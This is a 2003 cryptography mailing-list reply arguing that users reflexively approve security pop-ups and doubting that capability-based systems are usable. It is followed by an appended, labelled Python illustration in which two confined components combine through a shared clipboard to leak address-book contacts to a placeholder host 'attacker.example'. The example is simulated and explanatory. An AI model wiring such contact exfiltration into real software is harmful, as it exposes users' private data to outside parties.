[14308] in cryptography@c2.net mail archive
Re: Reliance on Microsoft called risk to U.S. security
daemon@ATHENA.MIT.EDU (Victor.Duchovni@morganstanley.com)
Sat Sep 27 18:20:20 2003
X-Original-To: cryptography@metzdowd.com
Date: Sat, 27 Sep 2003 15:48:29 -0400 (EDT)
From: Victor.Duchovni@morganstanley.com
To: "Jeroen C.van Gelderen" <jeroen@vangelderen.org>
Cc: Bill Frantz <frantz@pwpconsult.com>,
Ian Grigg <iang@systemics.com>, cryptography@metzdowd.com
In-Reply-To: <46C3ECBF-F113-11D7-B683-00039375644C@vangelderen.org>
On Sat, 27 Sep 2003, Jeroen C.van Gelderen wrote:
> I continue to believe that few users would grant an email message
> access to both the Internet and the Address Book when they are asked
> those two questions, provided that the user had not been conditioned to
> clicking "YES" in order to get any work done at all.
>
You have not met my users! This is really rather naive. Users don't
understand pop-up dialogues; they raise their stress level, and always
clicking "yes" makes the problem go away.
> There is no way around asking the user because he is the ultimate
> authority when it comes to making trust decisions. (Side-stepping the
> issues in a (corporate) environment where the owner of the machine is
> entitled to restrict its users in any way he sees fit. The point is
> that the software agent cannot make trust decisions.)
>
See above.
> > Also security is not closed under composition, two individually secure
> > components can combine to produce an insecure system. I think that no
> > such secure *non-trivial* least privilege system exists for a
> > graphical general purpose computer either in theory, or in practice.
>
> Are you familiar with the KeyKOS and EROS operating systems and/or
> Stiegler's CapDesk, a secure desktop in Java? They are all based on the
> Principle Of Least Privilege (through capabilities) and they manage to
> preserve security in the face of composition. Do you consider those
> systems to be trivial, or broken? What is the reason these systems
> cannot exist in theory or practice?
>
What fraction of "real" users will be able to use these systems? Will
users really understand the composition properties of security policies?
--
Victor Duchovni
IT Security,
Morgan Stanley
---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
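An added illustration, not code from this thread or from any of the systems named in it (KeyKOS, EROS, CapDesk), of the two claims argued over above: that in an object-capability design a component's authority is exactly the object references it was handed, and that two components which are each harmless on their own can still compose into a system that leaks. The component names, the `Clipboard` channel, the host `attacker.example` and the sample contacts are all constructed for the example; `leak_possible` is a plain reachability check over the reference graph, written here to show what the "composition property" a reviewer has to reason about actually looks like.

```python
"""Object-capability sketch (constructed example).

Authority is whatever object references a component holds; there is no
ambient "address book" or "network" global to reach for.
"""


class AddressBook:
    """Capability to read contacts: holding a reference to this object is the permission."""

    def __init__(self, contacts):
        self._contacts = tuple(contacts)

    def contacts(self):
        return self._contacts


class Network:
    """Capability to send data out. Records sends so the outcome can be inspected."""

    def __init__(self):
        self.sent = []

    def send(self, host, payload):
        self.sent.append((host, payload))


class Clipboard:
    """A shared mutable buffer. Harmless by itself: it holds no authority."""

    def __init__(self):
        self.text = ""


def reader_component(address_book, clipboard):
    """Untrusted component 1. It is handed the address book and a clipboard only;
    it never receives a Network reference, so on its own it cannot send anything."""
    clipboard.text = ",".join(address_book.contacts())


def sender_component(network, clipboard):
    """Untrusted component 2. It is handed the network and a clipboard only;
    it never receives an AddressBook reference, so on its own it cannot read contacts."""
    network.send("attacker.example", clipboard.text)  # hypothetical host


def run_isolated(contacts):
    """Each component gets a private clipboard: two separate, individually harmless systems."""
    book, net = AddressBook(contacts), Network()
    reader_component(book, Clipboard())
    sender_component(net, Clipboard())
    return net.sent


def run_composed(contacts):
    """Same two components, same per-component grants, but wired through ONE clipboard.
    Neither part was ever granted both capabilities, yet the composition exfiltrates."""
    book, net, shared = AddressBook(contacts), Network(), Clipboard()
    reader_component(book, shared)
    sender_component(net, shared)
    return net.sent


def leaked_contacts(sent):
    """Contacts that actually left the machine, as a list."""
    return [c for _, payload in sent for c in payload.split(",") if c]


# Static view of the same question: data-flow edges a reviewer can derive from
# which references each component was handed ("who can write to whom").
ISOLATED_FLOWS = {
    "address_book": {"reader"}, "reader": {"clipboard_1"},
    "clipboard_2": {"sender"}, "sender": {"network"},
}
COMPOSED_FLOWS = {
    "address_book": {"reader"}, "reader": {"clipboard"},
    "clipboard": {"sender"}, "sender": {"network"},
}


def leak_possible(flows, source="address_book", sink="network"):
    """Depth-first reachability: is there any chain of references from source to sink?
    This is the composition check that capability discipline makes mechanical, and
    that a pair of yes/no dialogs asks the user to perform in their head."""
    seen, stack = set(), [source]
    while stack:
        node = stack.pop()
        if node == sink:
            return True
        if node in seen:
            continue
        seen.add(node)
        stack.extend(flows.get(node, ()))
    return False


if __name__ == "__main__":
    sample = ["alice@example.org", "bob@example.org"]  # constructed sample data
    print("isolated leak:", leaked_contacts(run_isolated(sample)))
    print("composed leak:", leaked_contacts(run_composed(sample)))
    print("static check:", leak_possible(ISOLATED_FLOWS), leak_possible(COMPOSED_FLOWS))
```

The point of the reachability check is that it operates on the reference graph the system itself enforces, not on what the user believed they were answering when asked two separate questions; the composed configuration leaks precisely because the shared `Clipboard` is an edge nobody was asked about.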